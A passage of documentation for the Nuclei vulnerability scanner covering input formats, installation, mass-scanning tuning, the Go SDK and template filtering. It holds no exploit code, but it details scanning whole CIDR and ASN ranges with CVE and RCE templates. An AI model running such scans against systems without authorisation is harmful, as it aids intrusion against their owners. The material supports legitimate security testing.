* **Http Request Type**: Input formats that contain a complete HTTP request and cannot be expressed as a list of items (ex: OpenAPI Schema, Proxify Traffic Logs, etc.)
### List Type
List type formats can be specified in the following ways:
1. **`-u` flag**:
Comma Separated list of values (ex: `-u scanme.sh,127.0.0.1,AS1337,192.168.1.0/24`)
2. **`-l` flag**:
File containing list of values (ex: `-l urls.txt`)
3. **via stdin (or pipe)**:
List of values can be passed via stdin (ex: `cat urls.txt | nuclei`) or piped from other tools (ex: `mytool | nuclei`)
The following are the list type formats supported by Nuclei:
* **URLs**: A URL, for example `https://projectdiscovery.io`
* **IPs**: IPv4 or IPv6 address, for example `127.0.0.1` or `2001:0db8:85a3:0000:0000:8a2e:0370:7334`
* **CIDRs**: CIDR range, for example `192.168.1.0/24`
* **ASNs**: Autonomous System Number, for example `AS1337`
* **Domains**: Domain or Subdomain name, for example `projectdiscovery.io`
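For example, the list-type input methods described above look like this on the command line:
```bash
# Comma-separated values via -u
nuclei -u scanme.sh,127.0.0.1,AS1337,192.168.1.0/24
# File input via -l
nuclei -l urls.txt
# Piped via stdin
cat urls.txt | nuclei
```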
### HTTP Request Type
Due to the nature of these formats, they can only be specified via a file using the `-l` flag, and the format of the file needs to be passed via the `-input-mode` flag:
```
nuclei -l [format-file] -input-mode [format]
```
These formats can be classified into two types based on their usage:
* **API Specification**:
Companies/Developers write API specifications for their **RESTful APIs** in various formats, with the standard being **OpenAPI**. These specifications are used for multiple purposes like documentation, testing, code generation, etc.
**Nuclei v3.2.0 and later** uses these specifications to generate HTTP requests and test them against the target.
Nuclei supports **OpenAPI** and **Swagger** specifications, but other formats like Postman can be converted to the OpenAPI format and used with Nuclei.
For example, using **OpenAPI** schema in nuclei is as simple as:
```
nuclei -l openapi.yaml -im openapi
```
Nuclei also performs extra validations and accepts inputs and variables when generating requests. Refer to [openapi-validations](#openapi-validation) for more details.
* **Request-Response Logs generated by applications**
Many applications generate logs of requests and responses for debugging and monitoring purposes. These logs can be used by Nuclei to find vulnerabilities in the application.
Nuclei supports many popular formats:
* **Burp Suite Saved Items**: One can export request/response items from Burp Suite in XML format and use them with Nuclei (see the example after this list).
* **Proxify Traffic Logs**: [Proxify](https://github.com/projectdiscovery/proxify) by ProjectDiscovery exports logs in **JSONL** or **YAML-MultiDoc** format, which are supported by Nuclei.
**Others**:
Output of any application that either exports logs, or can be converted to logs, in the `JSONL` or `YAML-MultiDoc` specification of Proxify can be used with Nuclei.
This means the output of tools like [Katana](/tools/katana/), [Httpx](/tools/httpx/), etc. can be used with Nuclei.
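For example (the file names are illustrative):
```bash
# Burp Suite saved items (XML export)
nuclei -l burp-items.xml -im burp
# Proxify JSONL traffic log
nuclei -l proxify-logs.jsonl -im jsonl
```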
If you want to add support for a new format, please create a Pull Request to [nuclei](https://github.com/projectdiscovery/nuclei).
### OpenAPI Validation
When generating requests from an OpenAPI schema, Nuclei performs validations to ensure that the generated requests are valid and prompts for missing inputs and variables.
```bash
nuclei -h target-format
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
```
* **`-ro` flag**:
Parameters defined in OpenAPI schema can be optional or required. When `-ro` flag is used, Nuclei will only use required parameters and ignore optional parameters.
* **`-sfv` flag**:
When the `-sfv` flag is used, Nuclei will skip any and all requests that have missing parameters.
**Default Behavior**:
* **Missing Auth**:
If a given OpenAPI schema requires authentication, Nuclei will exit with missing parameters required for auth. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[FTL] openapi: missing global auth parameter: X-API-Key
```
These missing parameters can be passed using `-vars` flag. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -vars "X-API-Key=123"
```
* **Missing Required Variables**:
By default, when Nuclei finds a request with optional parameters, it uses them if available or skips those parameters. For missing required parameters, Nuclei will halt with an error. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
If the same command is run with `-v` flag (verbose mode), Nuclei will also log skipped optional parameters. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[VER] openapi: skipping optional param (scan_ids) in (query) in request [GET] /results/filters due to missing value (scan_ids)
[VER] openapi: skipping optional param (severity) in (query) in request [GET] /results/filters due to missing value (severity)
...
[VER] openapi: skipping optional param (template) in (query) in request [GET] /results/filters due to missing value (template)
[VER] openapi: skipping optional param (host) in (query) in request [GET] /results/filters due to missing value (host)
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
These missing parameters can be passed using the `-vars` flag or by **temporarily** specifying them in the auto-generated `required_openapi_params.yaml` file.
This file is generated in the current working directory when Nuclei halts due to missing parameters. Here's an example auto-generated `required_openapi_params.yaml` file:
```yaml
var:
- user_id=
- id=
- ip=
# Optional parameters
# - host=
# - name=
# - not_host=
# - not_severity=
# - not_template=
# - scan_ids=
# - search=
# - severity=
# - template=
# - vuln_status=
```
One can specify these missing parameters in the `required_openapi_params.yaml` file and they will be automatically picked up by Nuclei. If you prefer to specify these missing parameters using the `-vars` flag, you can do so as well.
The auto-generated `required_openapi_params.yaml` file is meant for temporary use, and it will be **deprecated** in the next release as we move towards our goal of **ProjectDiscovery Standard Authentication Across Tools** using the `secret` file.
* **Placeholder Parameter Values**
When Nuclei finds any request that has optional parameters and the `-ro` flag is not used, it will use placeholder values depending on the data type of the parameter. For example:
If a parameter is of type `string`, then `string` will be used as the placeholder value; the same goes for other known types, including timestamps and other data types.
# Installing Nuclei
Source: https://docs.projectdiscovery.io/tools/nuclei/install
Learn about how to install and get started with Nuclei
```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```
Nuclei requires the latest **GO** version to install successfully.
```bash
brew install nuclei
```
Supported on **macOS** (or Linux)
```bash
docker pull projectdiscovery/nuclei:latest
```
Docker-specific usage instructions can be found [here](./running#running-with-docker).
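As a quick sketch (assuming the image's entrypoint is the `nuclei` binary, as in the official image), a one-off scan can be run straight from the container:
```bash
# Run nuclei from the container against a single target
docker run --rm projectdiscovery/nuclei:latest -u https://example.com
```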
```bash
git clone https://github.com/projectdiscovery/nuclei.git; \
cd nuclei/cmd/nuclei; \
go build; \
mv nuclei /usr/local/bin/; \
nuclei -version;
```
Nuclei requires the latest **Go** version to install successfully.
```bash
https://github.com/projectdiscovery/nuclei/releases
```
* Download the latest binary for your OS.
* Unzip the ready-to-run binary.
```bash
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/helm
helm upgrade --install nuclei . -f values.yaml
```
This Helm chart creates two primary resources (intended to be configured via `values.yaml`):
* A Kubernetes CronJob to run Nuclei on a defined schedule
* An [Interactsh](https://github.com/projectdiscovery/interactsh) service for Nuclei to use
# Mass Scanning with Nuclei
Source: https://docs.projectdiscovery.io/tools/nuclei/mass-scanning-cli
Running Nuclei through the CLI on hundreds of targets
## What is **Mass Scanning?**
Mass scanning in the context of Nuclei means running the Nuclei CLI on more than 100 targets. While Nuclei works out of the box for scans on any number of targets, we recommend understanding the resource requirements of running Nuclei in different scenarios and how to properly adjust flags and options to avoid over-utilization of resources and get the best performance.
## Overutilization of Resources
If flags and available options are not properly configured, Nuclei can over-utilize resources and cause the following issues:
* Getting OOM-killed by the system
* Hangs and crashes
* Error code 137, etc.
## Understanding How Nuclei Consumes Resources
Nuclei is a highly concurrent tool with heavy network I/O by nature. There is a direct correlation between concurrency and memory usage.
**max-requests**
`max-requests` is a metadata field under the info section of a template that specifies the maximum number of outgoing requests the template can make.
**Below are some flags and options that directly affect the resource utilization of Nuclei:**
* **-c or -concurrency**
This flag controls the concurrency/parallelism of two components/operations in Nuclei, and its default value is 25.
1. Number of templates to run in parallel at a time (in Template-Spray/Default mode/strategy)
Number of templates to run in parallel per target (in Host-Spray mode/strategy)
2. Number of requests to send in parallel per template
For example, some templates have a `payloads` field and usually send multiple requests. This per-template request concurrency is controlled by the `threads: 10` value in the template.
If `threads` is not defined or missing (since it is optional), then Nuclei will use the `-c` value to decide the concurrency of requests per template.
* **-bs or -bulk-size**
This flag controls the concurrency/parallelism of targets in Nuclei, and its default value is 25.
In Host-Spray mode/strategy, this flag controls the maximum number of targets to run in parallel at a time.
In Template-Spray/Default mode/strategy, this flag controls the maximum number of targets to run in parallel for each template.
* **-hbs and -headc**
`-hbs` (-headless-bulk-size) and `-headc` (-headless-concurrency) flags are variants of the `-bs` and `-c` flags specifically for headless templates, since headless templates are resource intensive and run a headless browser in the background.
* **-jsc or -js-concurrency**
(Introduced in v3.1.8) This flag controls the maximum number of JavaScript runtimes to run in parallel at a time. JavaScript runtimes are used in templates with the `flow` field and the JavaScript protocol.
Although JavaScript templates are few compared to HTTP templates, this provides a way to control their resource utilization.
The default value of this flag is 120, which is tested to be optimal with minimal resource utilization. (Note: Nuclei by default reuses JavaScript runtimes to avoid the overhead of creating new runtimes for each request.)
* **-pc or -payload-concurrency**
(Introduced in v3.2.0) This flag controls the maximum number of payloads to run in parallel for each template. It only applies to templates that have a `payloads` field and do not have `threads` set; the default is 25 and can be adjusted as required.
* **-rl or -rate-limit**
This flag controls the global rate limit of HTTP requests in Nuclei, and its default value is 150 requests per second.
Note: Setting a low/very low value for this flag directly affects the speed (RPS) and memory usage of Nuclei, since the rate limit is applied just before sending requests; at that point the requests are already prepared and sitting in memory waiting to be sent.
* **-rlm or -rate-limit-minute**
An alternative to the `-rl` flag, this flag controls the global rate limit of HTTP requests in Nuclei in terms of requests per minute (not used by default and mutually exclusive with the `-rl` flag).
* **-ss or -scan-strategy**
This flag controls the strategy of scanning targets, and its default value is `auto` (see the example command after this list).
1. `auto` is currently a placeholder for the `template-spray` strategy.
2. The `template-spray` strategy can be understood as a stealthy mode of scanning that does not aggressively scan a single target. Instead of running all templates on a single target, it runs a template across multiple targets, thereby reducing the load on any single target without compromising scanning speed.
3. The `host-spray` strategy can be understood as a more focused mode of scanning that runs all templates on a single target before moving to the next target.
Although the difference might not seem significant, in reality it plays a major role in resource utilization and scanning speed. For example, the `template-spray` strategy is more stealthy but consumes more memory than `host-spray`, since the input/target chunk is different for each template, contrary to the `host-spray` strategy where the input/target chunk is the same for all templates.
This flag only decides the scanning strategy and uses the concurrency specified by the `-c` and `-bs` flags.
**Note**: The `host-spray` strategy currently does not support the resume feature due to implementation complexity.
* **-rsr or -response-size-read**
This flag controls the maximum size of an HTTP response that Nuclei should read, and its default value is 4MB (max).
For example, if an endpoint/target returns a 100MB response (a zip file or similar), Nuclei will only read the first 4MB of the response to avoid DoS, since the data read is stored in memory.
This plays a major role in the memory usage of Nuclei, because at any moment the heap memory of Nuclei is roughly `1-1.5 x (concurrency * response-size-read)`.
* **-stream**
Instead of probing all input URLs and then proceeding with the scan (default behavior), this flag continuously streams inputs to Nuclei instead of waiting for probing to finish.
It was observed that this flag may lead to high memory usage when running with the `template-spray` strategy, as Marshal/Unmarshal overhead is involved and each template has a different copy of the input/target chunk.
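As a rough illustration of how these flags combine on the command line (the values below are examples to adapt, not recommendations):
```bash
# Explicit scan strategy, moderate concurrency, a global rate limit,
# and periodic statistics output for a large target list
nuclei -l targets.txt -ss host-spray -c 25 -bs 50 -rl 300 -stats
```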
## Recommendations for Optimizing Resource Usage
Currently, there is no out-of-the-box solution to optimize Nuclei automatically for mass scanning. Understanding the proper use of flags and options can help optimize Nuclei for mass scanning.
In general, here are some recommendations to optimize Nuclei for mass scanning:
* Prefer the `host-spray` strategy when possible
* Do not constrain GC (garbage collection) by setting low memory limits if possible. Nuclei (just like the Go standard http library) focuses on reusing memory rather than freeing it and allocating it again. This is why Nuclei, like other Go tools, does not have high fluctuation in memory usage and instead increases or decreases memory usage gradually
* Properly adjust the `-c`, `-bs` and `-rl` flags after understanding the requirements and capabilities of your own system as well as the targets you are scanning
* Although Nuclei can handle any number of targets, we recommend batching targets based on target or system capabilities (see the batching sketch after this list)
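A minimal batching sketch using standard shell tools (the chunk size of 500 is an arbitrary example):
```bash
# Split a large target list into chunks and scan each chunk separately
split -l 500 targets.txt batch_
for f in batch_*; do
  nuclei -l "$f" -ss host-spray -stats -o "results_${f}.txt"
done
```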
## Feature-based Optimizations for Mass Scanning
* **-timeout**
Timeout controls the maximum time Nuclei should wait for a response (the current default is 10 seconds for HTTP and 6 \* the `-timeout` value for the code protocol).
This flag depends on your targets and the network conditions. Setting a low value might cause false negatives, while setting a high value might cause high memory usage and slow down the scanning process (see the example after this list).
* **-retries**
Retries controls the maximum number of retries Nuclei should attempt for a request (current default is 1)
This flag is useful when you are scanning targets with unstable network conditions. Setting a high value might cause high memory usage and slow down the scanning process.
* **-mhe or -max-host-error**
This flag controls the maximum number of (network type) errors to allow per host before removing the unresponsive host from the scan (current default is 30)
* **-nmhe or -no-max-host-error**
This flag disables the behavior of removing unresponsive hosts from the scan when they reach the maximum number of errors (current default is 30).
Note: This flag directly affects the speed and memory usage of Nuclei since it keeps unresponsive hosts in memory and retries them.
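For example, a more conservative pass over slow or flaky targets might look like the following (illustrative values only):
```bash
# Lower timeout, a single retry, and a stricter unresponsive-host threshold
nuclei -l targets.txt -timeout 5 -retries 1 -mhe 20
```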
## Reporting Performance Issues
Unlike other types of issues, performance issues require more information, and a different kind of information, to debug and fix. Hence it is recommended to report performance issues with the following information:
* Nuclei Version (if not latest then try with latest version)
* System Information (OS, Memory, CPU)
* Target Count and Template Count
* The above-mentioned flags and options used, especially `-c`, `-bs`, `-rl`, `-ss`
* Any other flags and options used
The above information will help in understanding whether the issue is due to misconfiguration or due to a bug in Nuclei. If the issue is of a more complex nature, like a memory leak, then application profiles need to be collected and shared in the issue description.
Profiling can be enabled in Nuclei using the `PPROF=1` environment variable, with the additional option `PPROF_TIME=10s`. Using these two environment variables enables profiling, and snapshots of the CPU and memory profiles are collected and stored in the appropriate directories every 10 seconds (`PPROF_TIME`). For additional options about profiling, refer to [nuclei-pprof](https://github.com/projectdiscovery/utils/tree/main/pprof).
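Based on the environment variables described above, enabling profiling for a scan looks like this:
```bash
# Collect CPU and memory profile snapshots every 10 seconds while scanning
PPROF=1 PPROF_TIME=10s nuclei -l targets.txt -stats
```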
A good example of reporting a performance issue like a memory leak is [#4552](https://github.com/projectdiscovery/nuclei/issues/4552).
## Maximize Your Nuclei Experience with PDCP
Building a Nuclei automation or running recurrent scans on more than 100 targets can be a challenging task without understanding Nuclei and experimenting with the flags and options.
One additional option is to consider evaluating ProjectDiscovery Cloud Platform or [PDCP](https://cloud.projectdiscovery.io). As a managed service it offers:
* All scaling and optimizations are abstracted away
* Scans are distributed and requests are appropriately chunked to scale without false negatives
PDCP includes many other helpful features for vulnerability scanning and ASM, like dashboards, integrations, reporting, recurring scans and much more.
For more information on PDCP, visit [PDCP](https://docs.projectdiscovery.io/cloud/introduction).
# Nuclei SDK
Source: https://docs.projectdiscovery.io/tools/nuclei/nuclei-sdk
Learn more about using the Nuclei SDK
## Nuclei SDK
Nuclei is primarily built as a CLI tool and typically optimizations and options are focused on improvements to the CLI. To address the increased usage of Nuclei from Go, we have introduced a revamped Go SDK of Nuclei in [v3.0.0](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/#sdk-4-all-revamped-go-sdk).
While the CLI is still the primary way to use Nuclei, additional documentation and an API reference along with examples are available at [pkg.go.dev](https://pkg.go.dev/github.com/projectdiscovery/nuclei/v3@v3.1.10/lib#section-readme).
> **Things to Note**:
>
> * Nuclei is still in active development, so breaking changes can be expected in the SDK. The team will continue to maintain the documentation to address changes as they are implemented.
> * Running Nuclei as a service may pose security risks. We recommend implementing Nuclei as a service with caution and additional security measures suited to your environment.
If you have questions, reach out to us through [Help](/help).
### Nuclei Version
Nuclei does not support an LTS version or a stable version. This is because Nuclei and templates function as a single unit and the Nuclei Engine will evolve to meet requirements and features to support writing new templates.
To ensure the best results we recommend keeping up to date with the latest version of the Nuclei SDK.
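For example, in a Go project that consumes the SDK, staying on the latest release is typically a matter of updating the module dependency:
```bash
# Update the Nuclei module to its latest tagged release
go get github.com/projectdiscovery/nuclei/v3@latest
go mod tidy
```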
## Performance and Optimization
Optimal and resource efficient usage of the Nuclei SDK requires a thorough understanding of [How Nuclei Consumes Resources](/tools/nuclei/mass-scanning-cli#understanding-how-nuclei-consumes-resources). We also recommend understanding optimization based on multiple factors. Refer to [mass-scanning](/tools/nuclei/mass-scanning-cli) for more details on scanning for larger target quantities.
### General Suggestions for Usage
* Implement a `host-spray` strategy when possible
* Do not constrain GC (garbage collection) by setting low memory limits if possible. Nuclei (just like the Go standard http library) focuses on reusing memory rather than freeing it and allocating it again. This is why Nuclei, like other Go tools, does not have high fluctuation in memory usage and instead increases or decreases memory usage gradually
* Properly adjust the `-c`, `-bs`, and `-rl` flags after understanding the requirements and capabilities of your own system as well as the targets you are scanning
* While Nuclei can handle any target quantity with the correct configuration, we recommend batching targets (based on target/system capabilities)
* Using Nuclei from the SDK provides more control in terms of customizing what to run and how to run it, and we recommend a proper chunking strategy that takes all factors into account
* Since the SDK is still in active development, we recommend reviewing Nuclei's internals, especially the `tmplexec` and `core` packages. Understanding the execution flow will give you more granular insights into how to optimize Nuclei for your use case
### Reporting Issues
After understanding all factors and optimization techniques mentioned in the documentation linked above, if you are still facing performance issues such as crashes or memory leaks, please report the issue with the details below:
* Nuclei Version (if not latest please try with latest version before reporting)
* Target/Input Count
* Template Count
* Values of all flags mentioned in [mass-scanning](/tools/nuclei/mass-scanning-cli) documentation or actual code snippet containing the same
* Observed Memory Usage
* Type of Handler used (NucleiEngine or ThreadSafeNucleiEngine)
* Any other relevant details
For memory leak issues, debug profiles using [pprof](https://go.dev/blog/pprof) are required to properly diagnose the issue.
# Nuclei Overview
Source: https://docs.projectdiscovery.io/tools/nuclei/overview
A fast and customisable vulnerability scanner powered by simple YAML-based templates
## What is **Nuclei?**
Nuclei is a fast vulnerability scanner designed to probe modern applications, infrastructure, cloud platforms, and networks, aiding in the identification and mitigation of exploitable vulnerabilities.
At its core, Nuclei uses templates, expressed as straightforward YAML files, that delineate methods for detecting, ranking, and addressing specific security flaws.
Each template delineates a possible attack route, detailing the vulnerability, its severity, priority rating, and occasionally associated exploits. This template-centric methodology ensures Nuclei not only identifies potential threats, but pinpoints exploitable vulnerabilities with tangible real-world implications.
New to scanners and Nuclei? Try it out today with a quick example through our [Getting Started](/getstarted-overview).
## What are Nuclei's features?
| Feature | Description |
| ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| [Extensive Template Library](#) | Nuclei offers a vast collection of community-powered templates for targeted scans of various vulnerabilities and attack vectors. |
| [Versatile Target Specification](#) | Support for various target specification options, such as URLs, IP ranges, ASN range, and file input, allowing flexibility in defining the scanning scope. |
| [Bulk Scanning](#) | Perform bulk scanning by specifying multiple targets at once, enabling efficient scanning of a large number of assets or websites. |
| [Flexible Customization](#) | Customize scanning templates to fit specific needs, allowing tailored scanning and focusing on relevant security checks. |
| [Parallel Scanning](#) | Supports parallel scanning, reducing scanning time and improving efficiency, especially for large-scale targets. |
| [Comprehensive Reporting `cloud`](#) | Generates detailed reports with actionable insights, including vulnerability details, severity levels, affected endpoints, and suggested remediation steps. |
| [Integration with CI/CD Pipelines](#) | Seamlessly integrate Nuclei into CI/CD pipelines for automated security testing as part of the development and deployment process. |
| [CI/CD Integration `cloud`](#) | Actively maintained and developed by the ProjectDiscovery team, introducing new features, bug fixes, and enhancements to provide an up-to-date scanning framework. |
| [Ticketing integration `cloud`](#) | Two-way ticketing integration with Jira, Splunk, and many others to easily remediate and retest vulnerabilities. |
| [Customizable Output Format](#) | Configure the output format of Nuclei's scan results to suit your needs, including options for JSON, YAML, and more. |
| [Dynamic Variables](#) | Utilize dynamic variables in templates to perform parameterized scanning, enabling versatile and flexible scanning configurations. |
| [Inclusion and Exclusion Filters](#) | Apply inclusion and exclusion filters to specify targets, reducing scanning scope and focusing on specific areas of interest. |
| [Authentication Support](/tools/nuclei/authenticated-scans) | Nuclei supports various authentication mechanisms, including HTTP basic authentication, JWT token authentication, and more. |
| [Embedding custom code in templates](#) | Execute custom code within Nuclei templates to incorporate user-defined logic, perform advanced scanning actions, and more. |
| [AI-Powered Template Generation](#) | Generate and run vulnerability templates on-the-fly using natural language descriptions powered by ProjectDiscovery's AI capabilities. |
## How can I use Nuclei?
The global security community, including numerous researchers and engineers, actively contributes to the Nuclei template ecosystem. With over 6500 templates contributed thus far, Nuclei is continuously updated with real-world exploits and cutting-edge attack vectors.
Nuclei templates support scanning for critical issues such as the Log4j vulnerability and RCEs that impact vendors such as GitLab, Cisco, F5, and many others. Nuclei has dozens of use cases, including:
| Use Case | Description |
| ------------------------------------------ | --------------------------------------------------------------------------------------------- |
| Web Application Security | Identifies common web vulnerabilities with community-powered templates. |
| Infrastructure Security | Audits server configurations, open ports, and insecure services for security issues. |
| API Security Testing `alpha` | Tests APIs against known vulnerabilities and misconfigurations. |
| CI/CD Security | Integrates into CI/CD pipelines to minimize vulnerabilities resurfacing in production. |
| Third-party Vendor Assessment | Evaluates the security of third-party vendors by scanning their digital assets. |
| Cloud Security `alpha` | Scans cloud environments for misconfigurations and vulnerabilities. |
| Mobile Application Security | Scans mobile applications for security issues, including API tests and configuration checks. |
| Network Device Security `alpha` | Identifies vulnerabilities in network devices like routers, switches, and firewalls. |
| Web Server Assessment | Identifies common vulnerabilities and misconfigurations in web servers. |
| Content Management System (CMS) Assessment | Identifies vulnerabilities specific to CMS platforms like WordPress, Joomla, or Drupal. |
| Database Security Assessment | Scans databases for known vulnerabilities, default configurations, and access control issues. |
## Who is Nuclei for?
People use Nuclei in a variety of ways:
* **Security Engineers/Analysts**: Conduct security assessments, proactively identify vulnerabilities, convert custom vectors into checks, and analyze the latest attack vectors.
* **Red Teams**: Leverage Nuclei as part of their offensive security operations to simulate real-world attack scenarios, identify weaknesses, and provide actionable recommendations for enhancing overall security.
* **DevOps Teams**: Integrate Nuclei into their CI/CD pipelines to ensure continuous security and regression of custom vulnerabilities.
* **Bug Bounty Hunters**: Leverage Nuclei to find vulnerabilities across their programs listed on platforms like HackerOne, Bugcrowd, Intigriti etc.
* **Penetration Testers**: Utilize Nuclei to automate their assessment methodologies into templates for their clients' systems.
### Security Engineers
Nuclei offers a number of features that are helpful for security engineers to customise workflows in their organization. With the varieties of scan capabilities (like DNS, HTTP, TCP), security engineers can easily create a suite of custom checks with Nuclei.
* Protocols support including: TCP, DNS, HTTP, File, etc
* Achieve complex vulnerability steps with workflows and [dynamic requests.](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/)
* Easily integrate into CI/CD, designed to be easily integrated into regression cycle to actively check the fix and re-appearance of vulnerability.
### Developers and Organizations
Nuclei is built with simplicity in mind. With templates backed by hundreds of community members, it allows you to stay updated with the latest security threats using continuous Nuclei scanning on your hosts.
It is designed to be easily integrated into the regression test cycle, to verify fixes and eliminate future vulnerabilities.
* **CI/CD:** Engineers are already using Nuclei within their CI/CD pipelines; it allows them to constantly monitor their staging and production environments with customised templates.
* **Continuous Regression Cycle:** With Nuclei, you can create a custom template for every newly identified vulnerability and add it to the Nuclei engine to eliminate it in the continuous regression cycle.
### Bug Bounty Hunters
Nuclei allows a custom testing approach, supporting your own suite of checks to easily run across your bug bounty programs. In addition, Nuclei can be easily integrated into any continuous scanning workflow.
* Nuclei is easily integrated into other tool workflows
* Can process thousands of hosts in a few minutes
* Easily automates your custom testing approach with our simple YAML DSL
Check our projects and tools to see what might fit into your bug bounty workflow: [github.com/projectdiscovery](http://github.com/projectdiscovery). We also host a daily [refresh of DNS data at Chaos](http://chaos.projectdiscovery.io).
### Penetration Testers
Nuclei can immensely improve how you approach security assessments by augmenting manual, repetitive processes. Consultancies are already converting their manual assessment steps to Nuclei, which allows them to run their custom assessment approach across thousands of hosts in an automated manner.
Pen-testers get the full power of public templates and customization capabilities to speed up their assessment process, particularly during the regression cycle where you can easily verify the fix.
* Easily create your compliance or standards suite (e.g. OWASP Top 10) checklist
* Use capabilities like [DAST](https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-overview) and [workflows](https://docs.projectdiscovery.io/templates/workflows/overview) to simplify complex manual steps and repetitive assessments through automation with Nuclei.
* Easily re-test a vulnerability fix by just re-running the template.
# Running Nuclei
Source: https://docs.projectdiscovery.io/tools/nuclei/running
Learn about how to run Nuclei and produce results
## How to Run Nuclei
Nuclei offers two primary ways to execute templates: individual templates (`-t`) and workflows (`-w`), both covered below.
### Supported Input Formats
Nuclei supports various input formats to run templates against, including URLs, hosts, IPs, CIDRs, ASNs, OpenAPI, Swagger, Proxify, Burp Suite exported data, and more. To learn more about input-specific options, refer to [nuclei input formats](/tools/nuclei/input-formats).
These inputs can be provided to Nuclei using the `-l` and `-input-mode` flags.
```console
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
```
Executing Nuclei against a list of inputs (URLs, hosts, IPs, CIDRs, ASNs) is as simple as running the following command:
```bash
nuclei -l targets.txt
```
For running other input formats (burp, jsonl, yaml, openapi, swagger), you can use the `-im` flag to specify the input mode.
```bash
nuclei -l targets.burp -im burp
```
```bash
nuclei -l openapi.yaml -im openapi
```
and so on.
### Executing Nuclei Templates
`-t/templates`
**Default Templates**
Most community templates from our [nuclei-templates repository](https://github.com/projectdiscovery/nuclei-templates) are executed by default, directly from the standard installation path. The typical command is as follows:
```sh
nuclei -u https://example.com
```
However, there are some exceptions regarding the templates that run by default:
* Certain tags and templates listed in the [default `.nuclei-ignore` file](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) are not included.
* [Code Templates](/templates/protocols/code) require the `-code` flag to execute.
* [Headless Templates](/templates/protocols/headless) will not run unless you pass the `-headless` flag.
* [Fuzzing Templates](/templates/protocols/http/fuzzing-overview) will not run unless you pass the `-fuzz` flag.
You can also run templates against a list of URLs:
```sh
nuclei -list http_urls.txt
```
**Custom Templates**
To run a custom template directory or multiple directories, use the following command structure:
```sh
nuclei -u https://example.com -t cves/ -t exposures/
```
Templates from custom GitHub repositories, stored under the github directory, can be executed with this command:
```sh
nuclei -u https://example.com -t github/private-repo
```
You can also directly run a template from any ProjectDiscovery Cloud Platform URL like this:
```sh
nuclei -u https://example.com -t https://cloud.projectdiscovery.io/public/tech-detect
```
### Executing Template Workflows
`-w/workflows`
[Workflows](/templates/workflows/overview) can be executed using the following command:
```sh
nuclei -u https://example.com -w workflows/
```
Similarly, Workflows can be executed against a list of URLs.
```sh
nuclei -list http_urls.txt -w workflows/wordpress-workflow.yaml
```
## Types of Templates
### Template **Filters**
Nuclei engine supports three basic filters to customize template execution.
1. Tags (`-tags`)
Filter based on tags field available in the template.
2. Severity (`-severity`)
Filter based on severity field available in the template.
3. Author (`-author`)
Filter based on author field available in the template.
By default, filters are applied to the installed template path; this can be customized by manually providing template paths.
For example, the command below will run all templates installed in the `~/nuclei-templates/` directory that have the `cve` tag.
```sh
nuclei -u https://example.com -tags cve
```
And this example will run all the templates available under the `~/nuclei-templates/exposures/` directory that have the `config` tag.
```sh
nuclei -u https://example.com -tags config -t exposures/
```
Multiple filters work together with an AND condition. The example below runs all templates that have the `cve` tag AND `critical` OR `high` severity AND `geeknik` as the template author.
```sh
nuclei -u https://example.com -tags cve -severity critical,high -author geeknik
```
### Advanced Filters
Multiple filters can also be combined using the template condition flag (`-tc`) that allows complex expressions like the following ones:
```sh
nuclei -tc "contains(id,'xss') || contains(tags,'xss')"
nuclei -tc "contains(tags,'cve') && contains(tags,'ssrf')"
nuclei -tc "contains(name, 'Local File Inclusion')"
```
The supported fields are:
* `id` string
* `name` string
* `description` string
* `tags` slice of strings
* `authors` slice of strings
* `severity` string
* `protocol` string
* `http_method` slice of strings
* `body` string (containing all request bodies if any)
* `matcher_type` slice of string
* `extractor_type` slice of string
Also, every key-value pair from the template metadata section is accessible. All fields can be combined with logical operators (`||` and `&&`) and used with DSL helper functions.
Similarly, all filters are supported in workflows as well.
```sh
nuclei -w workflows/wordpress-workflow.yaml -severity critical,high -list http_urls.txt
```
**Workflows**
In Workflows, Nuclei filters are applied to the templates or sub-templates run via workflows, not to the workflow itself.
### Public Templates
Nuclei has built-in support for automatic template download/update from the [**nuclei templates**](https://github.com/projectdiscovery/nuclei-templates) project, which provides a [community-contributed](https://github.com/projectdiscovery/nuclei-templates#-community) list of ready-to-use templates that is constantly updated.
Nuclei checks for new community template releases upon each execution and automatically downloads the latest version when available. Optionally, this feature can be disabled using the `-duc` CLI flag or the configuration file.
### Custom Templates
Users can host custom templates in a public or private GitHub/GitLab repository, AWS S3 bucket, or Azure Blob Storage container and run or update them while using Nuclei from any environment, without manually downloading the repository everywhere.
To use this feature, users need to set the following environment variables:
```bash
export GITHUB_TOKEN=gh_XXX
